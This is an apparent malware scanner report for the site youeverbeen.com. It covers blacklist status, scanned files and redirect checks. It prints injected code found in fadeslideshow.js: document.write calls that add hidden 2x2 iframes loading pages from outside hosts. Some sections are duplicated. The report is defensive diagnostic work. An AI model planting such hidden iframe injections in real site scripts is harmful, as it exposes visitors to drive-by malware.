Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=youeverbeen.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://youeverbeen.com/ | 200 OK Content-Length: 3416 Content-Type: text/html | clean |
http://youeverbeen.com/js/prototype.js | 500 Internal Server Error Content-Length: 756 Content-Type: text/html | clean |
http://youeverbeen.com/test404page.js | 500 Internal Server Error Content-Length: 756 Content-Type: text/html | clean |
http://youeverbeen.com/js/scriptaculous.js?load=effects,builder | 500 Internal Server Error Content-Length: 756 Content-Type: text/html | clean |
http://youeverbeen.com/js/lightbox.js | 500 Internal Server Error Content-Length: 756 Content-Type: text/html | clean |
http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js | 200 OK Content-Length: 72174 Content-Type: text/javascript | clean |
http://youeverbeen.com/fadeslideshow.js | 200 OK Content-Length: 14515 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://reddeerhotyoga.ca/aeed.html?j=1614279></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://artisticgenepool.com/oaaf.html?j=1614279></iframe>'); var fadeSlideShow_descpanel={ controls: [['x.png',7,7], ['restore.png',10,11], ['loading.gif',54,55]], fontStyle: 'normal 11px .appendTo(setting.$wrapperdiv) } }, getCookie:function(Name){ var re=new RegExp(Name+"=[^;]+", "i"); if (document.cookie.match(re)) return document.cookie.match(re)[0].split("=")[1] return null }, setCookie:function(name, value){ document.cookie = name+"=" + value + ";path=/" } } Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://reddeerhotyoga.ca/aeed.html?j=1614279 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://reddeerhotyoga.ca/aeed.html?j=1614279> Hidden iFrame found. size: 2x2 src: http://artisticgenepool.com/oaaf.html?j=1614279 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://artisticgenepool.com/oaaf.html?j=1614279> |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: youeverbeen.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 22 Dec 2014 03:14:39 GMT
Accept-Ranges: bytes
Server: Apache
Vary: Accept-Encoding
Content-Length: 3416
Content-Type: text/html
Last-Modified: Wed, 28 May 2014 10:00:34 GMT
...3416 bytes of data.
GET / HTTP/1.1
Host: youeverbeen.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 22 Dec 2014 03:14:39 GMT
Accept-Ranges: bytes
Server: Apache
Vary: Accept-Encoding
Content-Length: 3416
Content-Type: text/html
Last-Modified: Wed, 28 May 2014 10:00:34 GMT
...3416 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: youeverbeen.com
Referer: http://www.google.com/search?q=youeverbeen.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: youeverbeen.com
Referer: http://www.google.com/search?q=youeverbeen.com
Result:
The result is similar to the first query. There are no suspicious redirects found.